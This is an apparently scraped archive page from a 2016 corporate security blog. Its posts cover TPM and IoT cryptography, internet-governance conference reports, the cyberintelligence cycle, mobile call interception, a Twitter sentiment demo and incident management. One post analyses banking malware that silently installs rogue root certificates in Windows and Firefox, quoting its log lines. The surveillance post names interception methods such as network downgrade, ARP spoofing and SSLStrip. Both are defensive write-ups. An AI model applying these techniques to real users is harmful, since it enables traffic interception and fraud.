Se integran a nivel de la BIOS/UEFI del equipo, y permiten añadir ciertos criterios de seguridad en el pre-inicio del sistema, como la verificación de integridad ante cambios de configuración. Este mecanismo se conoce como "Registro de Configuración de Plataforma" o PCR. Una funcionalidad muy interesante y de gran utilidad es que ofrece la posibilidad de autenticar al dispositivo en lugar de a su usuario. Así, es posible establecer políticas de acceso a red en AP wireless, firewalls, routers, switches, etc. compatibles con la norma 802.1x. Configuración de TPM en una BIOS de American Megatrends La integración del TPM con el Sistema Operativo proporciona una completa API de servicios criptográficos que pueden ser ampliamente explotados con Microsoft Windows desde la versión Vista y Server 2008. Destaca especialmente la facilidad de uso con BitLocker para el cifrado de unidades de disco, con Outlook para el cifrado y/o firmado de correos electrónicos, en el almacenamiento de certificados digitales y credenciales de VPNs, y con diferentes políticas de grupo del Directorio Activo en Windows Server. Por su parte, Apple incluyó de forma fugaz módulos TPM en los primeros MacBook con procesador Intel durante el año 2006, aunque el soporte oficial es prácticamente inexistente en la actualidad. Del lado de GNU/Linux, se han desarrollado diferentes drivers y herramientas para el uso de los módulos TPM. Su soporte está incluido en el kernel de Linux desde la versión 2.6, junto con la posibilidad de albergar claves de SSH y establecer políticas de seguridad el arranque del sistema a través de Trusted GRUB y Uboot. Google distribuye sus Chromebook con un módulo TPM preactivado de fábrica, según indican, por cuestiones de seguridad que ya han sido analizadas por unos investigadores del MIT. Las especificaciones del TPM se recogen desde 2009 en en norma ISO/IEC 11889. La versión (TPM v2.0) más reciente es de 2014 e incorpora numerosos avances, como la posibilidad de utilizar múltiples Root Keys, resúmenes SHA-256 y algoritmos de cifrado de curva elíptica "ECC". Pero el avance más significativo lo constituye la posibilidad de implementar el módulo TPM en modo firmware (fTPM), ejecutado dentro de un Trusted Execution Environment (TEE). Se proporciona a nivel hardware en los procesadores más recientes de Intel, AMD y Qualcomm, y omnipresente en la arquitectura ARM denominándose TrustZone. Componente para la configuración de TPM en Windows Así, las características de seguridad hardware que proporciona el TEE constituyen la base de la seguridad criptográfica que están implementando la mayoría de smartphones de última generación, tanto en el proceso de autenticación biométrica, como en su uso como medio de pago. Aunque Apple emplea un desarrollo propio de características similares conocido como " Secure Enclave", integrado en sus nuevos procesadores A7. Criptografía antes del IoT Cuando buceamos en el Internet de las Cosas nos encontramos con diminutos sistemas embebidos que, con suerte, llegan a ejecutar versiones reducidas de Linux como sistema operativo porque en muchos casos, tan solo cuentan con un microcontrolador a modo de SoC (System On a Chip). Aunque las nuevas generaciones de SoC son cada vez más potentes, e incorporan capacidades de conectividad inalámbrica, siguen estando muy alejados de las características necesarias para trasladarles soluciones criptográficas de la IT tradicional, como los keystore software o los TPM hardware convencionales. Los pequeños dispositivos del IoT requieren soluciones criptográficas adaptadas a sus dimensiones, tanto de capacidad, como de complejidad, consumo, coste, etc. Aunque esto podría parecer novedoso, realmente no lo es tanto. La necesidad existe desde hace mucho tiempo, al igual que sus soluciones. Valga como ejemplo la naturalidad con la que a ceptamos, desde hace más de 25 años, la seguridad criptográfica en nuestros teléfonos móviles. Asumiendo que, por el mero hecho de estar en posesión de un SIM, la operadora nos podrá autenticar de forma unívoca sin riesgo de error, intromisión o suplantación, y que nuestras comunicaciones de voz y datos viajaran por el aire meticulosamente cifradas sin posibilidad alguna de intercepción por un tercero. Esto, que es una realidad de nuestro día a día, se logra al haber establecido un secreto compartido entre la operadora y nosotros, tan simple como una clave simétrica de 128 bits conocida como "Ki", celosamente custodiada en la infraestructura de la operadora, y robustamente almacenada dentro de nuestro SIM, de donde nunca saldrá. En este caso el SIM actúa como dispositivo criptográfico, almacenando la clave simétrica, realizando las operaciones criptográficas necesarias sobre ella sin que llegue a abandonar el SIM, e implementando medidas de protección adicionales ante ataques, tanto físicos como lógicos. Otro ejemplo similar, más reciente y avanzado, lo encontramos en España en el DNI electrónico. Tanto en su primera versión con contactos, como en la más reciente 3.0 inalámbrica, el DNIe almacena diferentes certificados digitales, pudiendo realizar sobre ellos diversas operaciones criptográficas de clave asimétrica. Aparecen entonces los retos derivados de la gestión de claves, simétricas o asimétricas, en dispositivos que, generalmente, serán remotos, autónomos o desatendidos. Cobra especial importancia la fase de "personalización" en la producción o post-producción de dispositivos, junto a las técnicas o mecanismos de despliegue o enrollment en sus respectivas plataformas de servicios. En las próximas entregas seguiremos hablando de la criptografía y su adaptación al mundo del internet de las cosas. * Seguridad criptográfica en IoT (I) * Seguridad criptográfica en IoT (II) * Seguridad criptográfica en IoT (III) * Seguridad criptográfica en IoT (IV) * Seguridad criptográfica en IoT (V) * Seguridad criptográfica en IoT (y VI) Jorge Rivera jorge.rivera@11paths.com
18 de abril de 2016
Nuestro paso por el SSIG 2016 (Parte 2)
¿Este año no has asistido a la 8ª conferencia anual de la Escuela del Sur de Gobernanza de Internet (SSIG)? No te preocupes, desde nuestro Blog te contamos todo y te ofrecemos los vídeos a las presentaciones. [Te recomendamos el discurso del ponente principal Vint Cerf, uno de los padres de Internet y vicepresidente de Google, que habla sobre el desarrollo internet y su impacto global]. Los participantes del SSIG, 2016. Foto de Glenn McKnight de ISOC Canadá. Para los que no hayáis leído, la primera parte de esta serie de post, el propósito principal de los SSIG es la formación de nuevos líderes de opinión en todos los aspectos relacionados con la gobernanza de Internet, lo que permite a sus estudiantes entender la complejidad relacionada con la gestión de Internet y su importancia en el futuro de Internet. Cómo comentó el secretario general adjunto de la OEA, Sr. Néstor Méndez: "Hoy en día, nos encontramos en un momento importante en la forma en que Internet es gobernada Esta transición tener la oportunidad de llevar a políticas que reflejan mejor la diversidad y necesidades de la comunidad internacional de Internet, sin embargo, con este desarrollo conlleva una gran responsabilidad es crucial que Internet permanezca libre y abierto a las generaciones futuras" Este año tenemos que destacar las magníficas acciones de la Organización de Estados Americanos (OEA), que ha puesto foco en compartir documentación y promocionar iniciativas de webcast y reuniones sociales de interés general relacionadas con la Cyberseguridad. En especial, destacamos el siguiente material: Mejores prácticas para establecer un Equipo de Respuesta a Incidentes de Seguridad Informática (CSIRT), con materiales de apoyo para la formación de grupos de respuesta a Incidentes de Seguridad Informática Otro documento interesante, es el informe publicado bajo el título de Cybersecurity: Are we ready in Latin America and the Caribbean?, resultado de un esfuerzo de colaboración entre el Banco Interamericano de Desarrollo (BID) y la Organización de Estados Americanos (OEA). En este estudio se presenta una visión completa y actualizada sobre el estado de la seguridad cibernética, en términos de riesgos, desafíos y oportunidades en América Latina y el Caribe y se ofrecen alternativas para que las naciones fortalezcan sus capacidades en materia de ciberseguridad, con el fin de ser eficaces, eficientes y sostenibles. En él, ha colaborado Centro de Capacidad sobre Ciberseguridad Global (GCSCC) de la Universidad de Oxford. La primera sección de este informe se compone de una serie de discusiones sobre las tendencias de la Cyberseguridad y la contribución de expertos reconocidos internacionalmente. A continuación se presenta la "madurez cibernética" de cada país a través del Modelo de Madurez de Capacidades Ciberseguridad (CMM), que se ocupa de las consideraciones de seguridad a través de cinco dimensiones de la capacidad y las evalúa más de cinco etapas de madurez para cada uno de sus 49 indicadores. En las próximas semanas seguiremos contando y aportando información sobre todos los temas que se discutieron este año en la Escuela del Sur de Gobernanza de Internet (SSIG), en cuestiones de cyberseguridad, ¡estad atentos! Leandro Bennaton CSA Brasil @bennaton Leonardo Huertas CSA Colombia @samuraiblanco
18 de abril de 2016
Nuestro paso por el SSIG 2016 (Parte1)
Este año, la 8ª conferencia anual de la Escuela del Sur de Gobernanza de Internet (SSIG) se ha celebrado en Washington del 29 marzo al 1 de abril de 2016, en la sede de la Organización de los Estados Americanos, OEA. El objetivo principal de la Escuela del Sur de Gobernanza de Internet es capacitar a los nuevos líderes de opinión en todos los aspectos relacionados con la Gobernanza de Internet, desde una perspectiva global y con foco en la región de América Latina y Caribe. Más de 200 expertos, se dieron cita para discutir el futuro del gobierno de Internet, la seguridad cibernética y también la libertad de expresión en internet. Entre los asistentes encontramos representantes de Estados Unidos, Canadá, Ecuador, Puerto Rico, Barbados, Trinidad y Tobago, República Dominicana, Argentina, Uruguay, Paraguay, Perú, México, Brasil, Guatemala, Bolivia, Costa Rica, Haití, El Salvador, Perú, Nicaragua , Paraguay y Venezuela. De acuerdo con la organización han seguido las transmisiones on-line de más de 25.000 participantes a distancia, llegando a 77 países de todo el mundo. Telefónica e ElevenPaths estuvieron representadas por una delegación de diferentes países, invitados a contribuir a los debates donde se trataron temas como la ciberseguridad y la libertad de expresión. Nuestros compañeros Leonardo Huertas y Leandro Bennaton, Chief Security Ambassadors de Colombia y de Brasil participaron en charlas y mesas redondas donde hablaron sobre nuestra visión y sobre cómo estamos abordando los nuevos retos digitales. Leonardo Huertas y Leandro Bennaton, CSAs de ElevenPaths, fotos por Glenn McKnight de ISOC Canada Como orador principal del evento, contamos con la presencia de Vint Cerf, uno de los creadores, cariñosamente llamado el padre de Internet. El Sr. Cerf es vicepresidente de Google y uno de los más grandes evangelista de Internet. En su discurso abierto introdujo el desarrollo de Internet y su impacto global. En su presentación se trazó el desarrollo de Internet desde sus orígenes hasta sus manifestaciones actuales, tales como el IoT, un tema que elevó el tono de alerta debido a los desafíos de seguridad para el IoT, relacionado con el informe: "Alcance, escala y riesgo sin precedentes: Asegurar el Internet de las cosas”. Disponible también en portugués El Internet de las cosas plantea preguntas complejas sobre ética y política pública para las cuales la comunidad de Internet debe prepararse a responder. Según Vint Cerf “La Gobernanza de Internet debe centrarse en las necesidades del usuario final”. Vint Cerf, el padre de Internet, fotos por Glenn McKnight de ISOC Canada. Muchos datos son recogidos en el IoT y nunca puede estar completamente seguro. Debe haber un equilibrio entre la necesidad de recoger una gran cantidad de datos y proteger la información privada recogida. Compartiendo las palabras de Vint Cerf "el gobierno de Internet debe centrarse en las necesidades de los usuarios finales. El IoT trae problemas complejos de la ética y la política pública, la comunidad de Internet debe estar preparada para hacer frente". En las próximas semanas vamos a seguir contando lo que se discutió y temas relevantes de la Escuela del Sur de Gobernanza de Internet (SSIG), especialmente las relacionadas con la Seguridad Cibernética, estad atentos! Leandro Bennaton CSA Brasil @bennaton Leonardo Huertas CSA Colombia @samuraiblanco
8 de abril de 2016
Las Fases de la Ciberinteligencia
Una disciplina muy importante en seguridad de la información, es la Inteligencia y también existe la Ciberinteligencia, que es la inteligencia aplicada a la informática o al Ciberespacio, la forma de aplicar la Cibeinteligencia se basa en un ciclo (que esta basado en el ciclo de la inteligencia) con fases que explico a continuación. Fase 1 - Planificación Esta fase como lo dice su nombre, planificamos, se define quién coordinara la misma e identificaremos las necesidades y la información que demandan los destinatarios del proceso de ciberinteligencia. Debemos en esta fase definir cuál va a ser la estrategia para la recolección de la información, el tipo de información y el contenido definiendo y clasificando la disponibilidad y fiabilidad de las fuentes y los flujos de la comunicación. Fase 2 - Recolección El objetivo de esta fase es obtener la información en bruto. Cuanto mayor información obtengamos mejor, pero es importante tener los atributos relacionados con esa información, saber su clasificación de seguridad, conocer la fuente, el contexto, la fiabilidad de la fuente, la integridad de la información, la fecha de la misma, etc. Todos estos atributos serán necesarios para la fase siguiente de análisis. Esta recolección de información es importante realizarla bajo un marco legal, es muy fácil franquear barreras legales y/o normativas que pueden anular la eficacia del resultado de la ciberinteligencia. Fase 3 - Análisis En esta fase analizamos la información obtenida, debemos depurarla, tratarla, procesarla, eliminar aquella inservible, decodificarla y analizarla en un contexto global. Se trata de convertirla en inteligencia estratégica, táctica u operativa destinada al propósito inicial establecido en la planificación. En esta fase debemos también clasificar la información en función a los diversos atributos asociados como la fiabilidad de la fuente, fiabilidad de la información, validez de los datos, oportunidad, pertinencia, relevancia y utilidad. Un proceso muy importante, es ser capaces de interpretar esa información, de forma que podamos gracias a nuestro intelecto y la información tratada a poder crear en nuestras mentes la realidad y entrar en la mente de nuestros enemigos para saber el porqué de sus acciones y adelantarnos a sus próximos movimientos. Fase 4 - Retroalimentación Esta fase es parte de todo ciclo de gestión, en el viejo conocido Ciclo de Demming se refiere a la fase de “Check”, consiste en retroalimentarse para adecuarse si es necesario, durante el análisis fuimos capaces de crear inteligencia, tener nuevos conocimientos que deben servir para corregir e introducir nuevas variantes en todas las fases anteriores, es decir, definir nuevas estrategias y planificación, recolectar desde nuevas fuentes o de las anteriores nueva información, realizar nuevos cruces y procesamiento de análisis de la información para generar nueva inteligencia. Fase 5 - Difusión Es la última fase de este ciclo y tiene por objetivo suministrar la inteligencia a quien deba ejecutar las acciones pertinentes con la suficiente diligencia para que la misma no sea tardía para la toma de decisiones. Es habitual en los esquemas que representan el ciclo de la Inteligencia que el mismo sea un círculo que no tiene fin. Productos y Servicios de Eleven Paths En Eleven Paths hemos desarrollado productos y servicios que agregan valor desde la Fase 2 en adelante, ya que para la Fase 1 las herramientas que se recomiendan son las clásicas para administrar proyectos, Cartas Gantt, sistema de gestión de proyectos, planilla Excel, etc. En la Fase 2 el servicio de facto que tenemos en 11P es Cyberthreats ( https://www.elevenpaths.com/es/tecnologia/cyberthreats/index.html) ya que recolecta y clasifica información y hallazgos de distintas fuentes de información haciendo reconocimiento pasivo del objetivo, Sandas (https://www.elevenpaths.com/es/tecnologia/sandas/index.html) también aporta gracias al modulo de Detección colaborativa que Agrega múltiples fuentes internas y externas de datos, adquiriendo información de Internet y el mundo físico. En la Fase 3 nuestro principal producto es Sinfonier ( https://www.elevenpaths.com/es/tecnologia/sinfonier/index.html) ya que genera información de valor con datos recopilados de todas las fuentes de información disponibles. Sinfonier permite integrar, procesar y analizar datos internos y externos de una organización ofreciendo la información de forma visual y en tiempo real. También nos ayuda mucho el servicio de Cyberthreats ya que en el portal de gestión de amenazas la información que entregamos esta depurada, clasificada, contextualizada analizada e interpretada. También Sandas, ya que es una plataforma integral de monitoreo, centralización y gestión de incidentes que permite hacer Análisis, categorización, notificación y respuesta inmediata a los incidentes de seguridad de la información. En el mundo móvil y para Android tenemos Tacyt ( https://www.elevenpaths.com/es/tecnologia/tacyt/index.html) que supervisa, almacena, analiza, correlaciona y clasifica millones de apps móviles mediante su tecnología de big data añadiendo miles de aplicaciones nuevas cada día. En la Fase 4 también nos ayuda mucho el servicio de Cyberthreats ya que en el portal de gestión de amenazas los analistas están constantemente revisando la información de los hallazgos, eliminando falsos positivos, creando nuevas correlaciones, etc. Y SANDAS ya que detecta mediante algoritmos de inteligencia incidentes de seguridad que pasan desapercibidos para los SIEM. Para finalizar el ciclo, en la Fase 5 volvemos a citar a Cyberthreats y SANDAS ya que ambos son portales web en tiempo real y cuadros de mando operacionales y configurables para la gestión de incidentes de seguridad, la diferencia es que Cyberthreats es de reconocimiento pasivo y SANDAS de incidentes activos. Espero haber cumplido el objetivo de explicarles las fases de la Ciberinteligencia y como pueden apoyarse en nuestros productos y servicios para llevarla a cabo, hasta el próximo post. Gabriel Bergel CSA - Chief Security Ambassador @gbergel gabriel.bergel@global.11paths.com
28 de marzo de 2016
Mobile phone Surveillance: Who’s listening to your calls?
In the current digital world, espionage is much more common than we think. Revelations from Edward Snowden that the NSA hacked SIMs to spy on mobile conversations prove that physical proximity is no longer necessary for surveillance. It is for this reason that mobile gadgets make ideal tools for surveillance. This is due to the many devices that tend to include microphones, cameras, GPS, WIFI or storage capacity. Hackers are easily able to keep watch on their victims by simply infecting a mobile phone or interfering with wireless communications - often without cutting-edge technology. So while the benefits of increased online and mobile working are widely accepted - and these include ubiquitous access to information, flexibility and improved productivity - are companies aware of the risks and more importantly prepared to step up and manage them? The thing about mobile surveillance is that it is usually a targeted attack, with the objectives of the surveillance preselected. Top executives and politicians for instance are often targeted because they manage strategic plans that have great economic impact. Attacks of this kind tend to include social engineering strategies and are very often associated with advanced persistent threats. The simple truth is that a mobile ecosystem requires a permeable security perimeter through which legitimate communications can flow. However, criminal organisations can make use of these channels to steal information or boycott the corporate infrastructure. The implementation of enterprise mobile strategies involves a higher degree of vulnerability, which can and should be efficiently managed. Let’s look at some of the techniques used in cellphone surveillance: How is voice communication intercepted? There are a number of methods in which voice communication could be intercepted. These include: Interception of public mobile networks: 2G networks are not a secure communication channel. Hackers can make use of inhibition devices (such as Jammer) to force a downgrade from 3G or 4G networks to 2G, in order to listen through specialised devices. Man in the middle: ARP (Address Resolution Protocol) spoofing can allow an attacker to intercept data frames on a network, modify or stop all traffic. It is also possible to intercept the communications by means of rogue hotspots or antennas. SSLStrip can then force a victim's device into communicating with an adversary, replacing HTTPS protocols by plain-text over HTTP. Risks in the Public Switched Telephone Network (PSTN): Communications are unencrypted – as in the case of voice and SMS text – while they go through the core operator infrastructure. Other risks are uncontrolled call forwarding and spoofing. Malware installed on the device: Malware can intercept packages between the call application and the operating system, or even capture the voice directly accessing the microphone software controllers. What features should a secure call system fulfil? A secure call system works by making voice digitised, encrypted and transmitted in data packets through the mobile data network. The product should combine telephone and messaging protection, powered by security mechanisms and advanced point-to-point encryption technologies compatible with IP communication. So what can companies and individuals to to secure calls? There are three main ways. Secure the smartphone: There are two modalities of secure smartphones. Firstly, a device built from the ground up with specific hardware and a secured OS. Second, modality deals with popular devices that includes a pre-installed secured OS. In both cases secured OS’s consist of high-end mobile threat protection components, containerisation, encrypted storage, remote management and authentication system. These are usually the most expensive solutions and less flexible. Secure add-ons: Physical components such as smartphone cases or SD memories, which address the voice encryption by means of an encryption processor included in the add-on itself. It wouldn’t matter if the device itself became infected since the information goes through the component encrypted. Secure call apps: These apps allow users to make end-to-end encrypted phone calls from the most popular mobile OS’s. The user experience is similar to the pre-installed non-secure call application. Contacts and messages are encrypted and stored by the app itself. What does an optimal solution look like? In a general corporate setting, hardware solutions can be difficult to deploy as they require a different smartphone model, a second smartphone or some kind of attached hardware. This may discourage users from making calls and may generate a fake sense of security in the security department. As a result, hardware solutions are not especially suitable for a general business. These solutions may be helpful for a limited group of senior managers or for the most security demanding environments such as the military, government, or companies that need the upmost protection level. Edward Snowden brought to light the need to protect company communications, and to update security to the digital age - against malware, network attacks, exploits or any other type of attack that could impact businesses significantly. Secure call applications combined with an advanced threat protection are by far cheaper and more user friendly than a secure smartphone and can be managed through a mobile device management. Eliminating surveillance doesn’t have to be complex, and businesses need to bake security prevention into their company policy from the off. *It may be of your interest: IoT - The new security headache for the enterprise IT department? BANDS: Detección proactiva de amenazas en infraestructuras críticas Francisco Oteiza francisco.oteiza@11paths.com
23 de marzo de 2016
Sinfonier Community and beyond!
When we show Sinfonier and I mention its benefits, people always do the simple same question: So, we can do anything with it? The simple answer is yes, if you know the sources you want to monitor, what you are looking for and if the necessary APIs are in place to use the existing modules offered by Sinfonier or to create the new modules you require. This time, instead of showing a security example, I would like to propose in this technical community to monitor the sentiment in Twitter about and event that happened in December 1916 in Verdun in WWI where about 700.000 French and German soldiers died during a ten months battle. To achieve this task I have followed the next steps: ACCESS DATA: Twitter. I have created an account in this social media network which delivers real-time stream of semi-structured data (loosely formatted characters inside a field but with little structure within it). The information is delivered in a JSON format which is what I will need to process. For example, word to search in the tweets: Verdun. PREPARE AND CLEANSE DATA: Filter. I just want to keep those tweets written in a specific language, in this case English. In the field “lang” belonging to each tweet, I search for those tweets written in “ en”. APPLY ADVANCED ANALYTICS: Now I add to my topology the module named “ AlyClassApi” which sends the text, in English and mentioning the word Verdun, to a sentiment analysis cloud service called Aylien (after creating a free user account – 2000 queries per day) which will classify the text in the tweet according to some predefined categories. As this module delivers a JSON array, I need to use the module called “EmitItemList” which will create simple JSONs for those elements present in the array (in this case the array is called categories). Having simple JSONs, I use a second filter module in order keep those tweets that I presume they are mentioning the battle of Verdun, so I search for the categories having the words history, war and culture. The results are then analysed by a second Aylien sentiment module that simply categorises the filtered texts as “positive or negative” (another category that is not considered is the category called “neutral”). OUTPUT RESULTS: The final tweets are sent to two MongoDBs (after creating a free user account) where I can finally read those tweets which have gone through all the steps. The final topology looks like the following diagram: The logical results show that the battle of Verdun still suggests a negative sentiment and mainly those which have been categorised as positive, are those people who like to know about what happened during that time in the WWI. If this example does not suit your needs, you can also try to find out if that brand you like, it is perceived positively or negatively (for example, those local popular chocolate drinks such as ColaCao in Spain, Poulain in France or Vanhouten in the Netherlands). Or maybe to gain insights rapidly about what tourists think about your town/city recently visited, by simply changing the word to search in Twitter, using the word of your town/city and in the second filter to filter by tourism, culture and entertainment. This may assist some town/city councils to evaluate their activities promoting tourism. Sebastian García de Saint-Léger sebastian.garciadesaintleger@telefonica.com Thanks to Fran and Alberto.
18 de marzo de 2016
Malware que instala certificados raíz en Windows y Firefox automáticamente
El malware y el mundo de los certificados parecen condenados a entenderse, y cada vez más. Aunque Avira ya ha hablado sobre una muestra parecida hace unos días, en ElevenPaths hemos encontrado otra evolución que le da una pequeña vuelta de tuerca a esta técnica de inyectar certificados raíz en el sistema. Veremos aquí en qué consiste el detalle y repasamos algunos incidentes anteriores. Los creadores de malware se están viendo obligados a utilizar técnicas ingeniosas para utilizar inteligentemente la oportunidad que brindan los certificados en todas sus dimensiones y hacer gala así de una legitimidad de la que carecen. Una de las muestras recientemente detectadas por Avira, instala un certificado raíz legítimo de COMODO en el sistema, pidiendo al usuario que sea él mismo quien lo valide. Entendemos que se trata de una primera fase de la infección en la que, una vez con el certificado en el sistema, el malware lo redirigirá a páginas falsas firmadas con certificados hoja que se verán perfectamente legítimas en el navegador de la víctima. Sin embargo, en ElevenPaths hemos observado una pequeña evolución en la que es el propio malware el que valida la instalación del certificado. O sea, se encarga de hacer desaparecer la ventana de seguridad, pulsando él mismo sobre "Sí" para que la víctima no perciba la instalación. Además, este malware también inyecta un certificado raíz no solo en el sistema, sino también en el TrustStore de Firefox (que no utiliza el de Windows). Por tanto, use el navegador que use, la víctima confiará en un certificado de un tercero. Esto permitirá que cuando visite un dominio real de su banco (pero alojado en un servidor falso) todo parezca perfectamente legal a ojos del navegador y del sistema. Mostramos aquí un pequeño vídeo explicativo del funcionamiento en el que se observa la ventana de instalación siendo eliminada rápidamente por el propio malware. En un sistema "normal" sin demasiada carga de trabajo, la ventana no llegaría ni a percibirse, puesto que sería instantáneamente interceptada por el malware. Esto es lo que debería ver el usuario, pero que el malware intenta evitar programando un clic rápido sobre el botón de aceptar Este tipo de ataque nos hace recordar incidentes similares en los que se ven involucrados certificados raíz instalados de serie, como los casos en portátiles Lenovo ( Superfish) o eDellRoot. En esos casos, se hizo pública la clave privada, pero en este, la clave pertenece al atacante que además controla el sistema, por lo que el ataque es "personalizado" a la víctima y simplifica mucho la programación. Por ejemplo, al contrario que los míticos troyanos bancarios rusos tipo Zeus, aquí no debe acudir a técnicas de inyección en el navegador, sino que basta con montar un servidor falso para que la página troyanizada se vea bastante legítima. Sin resultar técnicamente espectacular, es una manera muy ingeniosa de mantener la simplicidad y la eficacia. Por lo demás, el malware resulta sencillo en cierta manera, y es bastante detectado por los antivirus. Puede tratarse de una especie de prueba de concepto o tanteo. Eso sí, el certificado no ha sido revocado aún y parece que está circulando desde hace ya cuatro meses. Algo muy curioso que realiza este malware es el uso de Powershell en general además de eliminar el proxy de Firefox. El registro que almacena el propio malware es bastante autoexplicativo. Instala un certificado y elimina las referencias a un potencial proxy en Firefox, lo que puede significar que el atacante no quiere que nada interfiera en la comunicación. Estas son algunas líneas interesantes. [Firefox::InstallCert(): Init OK]:[firefox]:[92]
[Firefox::InstallCert(): Init find OK]:[firefox]:[98]
[Firefox::InstallCert(): Profile: '%APPDATA%MozillaFirefoxProfiles5
[Firefox::InstallCert(): Init cert OK]:[firefox]:[118]
[Firefox::InstallCert(): CERT_GetDefaultCertDB OK]:[firefox]:[131]
[Firefox::InstallCert(): CERT_ChangeCertTrust OK]:[firefox]:[139]
[Firefox::InstallCert(): Add cert OK]:[firefox]:[142]
[Firefox::InstallCert(): Find OK]:[firefox]:[144]
[Firefox::InstallCert(): Free OK]:[firefox]:[147]
[Cert was added to Firefox!]:[core]:[209]
Remove 'network.proxy.type' from '%APPDATA%MozillaFirefoxProfiles5prefs.js']
Remove 'network.proxy.autoconfig_url' from '%APPDATA%MozillaFirefoxProfiles5prefs.js']
[Pac was added to Firefox!]:[core]:[218] Certificado raíz del atacante, que intenta simular venir de Thawte El certificado en sí está firmado para poder hacer virtualmente cualquier cosa, pero entendemos que la intención del atacante es montar servidores maliciosos con certificados falsos (pero dominios verdaderos), creados para que validen contra esa CA que acaba de instalar en su víctima. El crimen perfecto. Es interesante comprobar cómo el malware aprovecha un viejo truco de pulsar las teclas por el propio usuario. Esto es algo ya resuelto en UAC por ejemplo con la atenuación de escritorio… pero no se hace con los certificados. Microsoft podría tomar nota y atenuar el escritorio cuando se va a aprobar la instalación de un certificado importante. Más detalles sobre el certificado que instala el malware Certificados: Authenticode y TLS Las razones por las que el malware necesita utilizar certificados son varias. Además desde dos perspectivas diferentes. Intentemos esquematizar las ideas más importantes, de por qué son dos mundos relacionados. Desde la perspectiva de Authenticode (código ejecutable firmado en Windows), la necesidad es clara. Hace ya algunos años que Windows obliga a que los drivers en 64 bits se encuentren firmados para poder ejecutarse. Esto hace que quien quiera instalar un rootkit necesite comprar un certificado específico y garantizar en cierta manera su identidad (falsa o no) o robar algún certificado de un tercero. De hecho, desde hace tiempo, el malware firmado en este sentido va en aumento. Los atacantes que optan por robar certificados de terceros, han visto tal nicho en este negocio, que ya cuentan con un servicio de "certificados robados" que pueden comprar. Hasta ahora, habíamos visto certificados robados y usados para ataques ad-hoc. El hecho de firmar un código, hoy por hoy, tiene cierto peso para los antivirus. Si hablamos de heurística, automáticamente un archivo firmado es menos sospechoso. También, los atacantes que se mueven en la zona gris (adware en general) utilizan certificados para firmar su código y darle un empaque del que carecen, pero que les cubre en cierta manera legalmente y les acerca un poco "más a la luz". Desde la perspectiva de los certificados TLS, la relación con el malware es más indirecta, pero interesante, como muestra este mismo ejemplo, del que podemos sacar varias conclusiones: Podríamos estar ante una nueve tendencia interesante en la que el malware bancario intenta abusar de forma sencilla de los certificados raíz. Si bien esta muestra no es especialmente reciente, es pronto para saber la relevancia del alcance. Además, se podría reclamar a Microsoft, como medida de precaución, que exija la elevación con atenuación de escritorio para instalar certificados raíz. Firefox, por su parte, ni siquiera emite una advertencia de que se va instalar el certificado. También desde el punto de vista de TLS, el malware bancario sí que se ha dedicado desde hace mucho a robar certificados cliente instalados en el navegador de la víctima para autenticarse. Otras aproximaciones a los certificados Otra aproximación curiosa que realizaba un malware no hace mucho, era la de bloquear a los antivirus aprovechando de nuevo el "TrustStore" de Windows y la firma electrónica de los binarios de los antivirus. En resumen, instalaba como "no confiables" los certificados de varios motores y así conseguía que dejasen de funcionar. Algo de lo más curioso, y que demostraba de una forma ingeniosa cómo eliminar elegantemente de la ecuación al enemigo natural. Certificados de antivirus en el repositorio de no confiables, y un antivirus negándose a funcionar por ello. Sergio de los Santos ssantos@11paths.com @ssantosv
14 de marzo de 2016
Gestión de incidentes (II)
Habiendo visto en la primera entrega, Gestión de Incidentes (I), los conceptos básicos de la gestión de incidentes, pasaremos a ver en este artículo, tal y como lo prometimos, la descripción del proceso en sí. Recordemos que son varios los propósitos de la gestión de incidentes en general, sin embargo debemos considerar como mínimo que busca: Descubrir variaciones en los servicios TI. Registrar y clasificar estas variaciones. Adicionalmente a lo anterior, se debe contemplar la asignación del talento humano (recurso de personal) encargado de restituir el servicio según se defina en el SLA correspondiente. Para esta actividad se requiere un estrecho contacto con los usuarios, por lo que el help desk desempeña un papel primordial en el mismo. Registro de incidentes: Los incidentes pueden entrar al proceso de gestión proviniendo de una variedad de orígenes tales como: gestión de aplicaciones, soporte técnico, etc. Verificar que el incidente aún no ha sido registrado es necesario para evitar duplicaciones innecesarias debido al reporte sobre el mismo inconveniente por parte de varios usuarios. Al incidente se le asignará un identificador para su tratamiento en los procesos internos y en las comunicaciones con el cliente. La hora, descripción del incidente, sistemas afectados, etc., debe ser información relevante para alimentar la base de datos asociada al procesamiento del incidente. En determinado caso debe ser posible adjuntar información pertinente a la resolución del incidente; la cual puede ser solicitada al cliente mismo mediante formularios específicos diseñados para tal fin. Esta información también puede ser obtenida de la propia base de datos de la gestión de la configuración. En los casos en que el incidente pueda impactar a otros usuarios estos deben ser informados para darles a conocer una probable afectación por parte del incidente tratado. Clasificación: Esta etapa tiene como objetivo principal el seleccionar toda la información que pueda ser de utilidad para la resolución del incidente y entre otros aspectos puede contemplar: Que se asigne una categoría y/o subcategoría. Que se le asigne una priorización de acuerdo con unos parámetros definidos previamente. Que se le asigne recurso (del segundo nivel) de talento humano por parte del help desk en caso de que en una primera instancia no se hubiese podido brindar solución. Que se asocie un estado al incidente (por ejemplo: registrado, activo, suspendido, resuelto, cerrado) y se estime el tiempo de resolución del incidente en base al nivel de servicio correspondiente y la prioridad. Análisis, resolución y cierre del incidente: El primer paso es verificar si el incidente se ha presentado anteriormente y ha sido resuelto para poder aplicar el procedimiento asignado. En caso tal de que el incidente pueda ser solucionado por el primer nivel, este debe ser escalado al nivel inmediatamente superior para su atención por parte de los especialistas correspondientes. Durante el proceso de tratamiento del incidente, se debe documentar el mismo en las bases de datos de gestión de incidentes para que en caso de ser necesario, se pueda consultar por parte del actor autorizado e interesado. Si el incidente fuese repetitivo y en dado caso que no se encuentre solución al mismo, se deberá informar a la “Gestión de Problemas” para el estudio detallado de las causas subyacentes. En caso de solucionarse el incidente: Debe confirmársele al usuario la solución satisfactoria y debe ingresarse la resolución a la KB. Reclasificar el incidente si es necesario. Actualizar la información en la CMDB (Gestión de Configuraciones) sobre los elementos de configuración (CI) implicados en el incidente. Cierra el incidente. Entre otros aspectos, podríamos concluir como resumen de una correcta gestión de incidentes: Que se aumenta la productividad de los usuarios. Se logra un mejor control de los procesos y monitorización del servicio. Se logra una optimización de los recursos disponibles. Que principalmente se mejora la satisfacción general de clientes y usuarios. Por otra parte, una inadecuada gestión de incidentes puede acarrear efectos contraproducentes tales como: Reducción de los SLAs. Se puede malgastar valiosos recursos trabajando concurrentemente en la resolución del incidente. Se crean clientes y usuarios insatisfechos por la mala y/o lenta gestión de sus incidentes. Leonardo Huertas CSA – 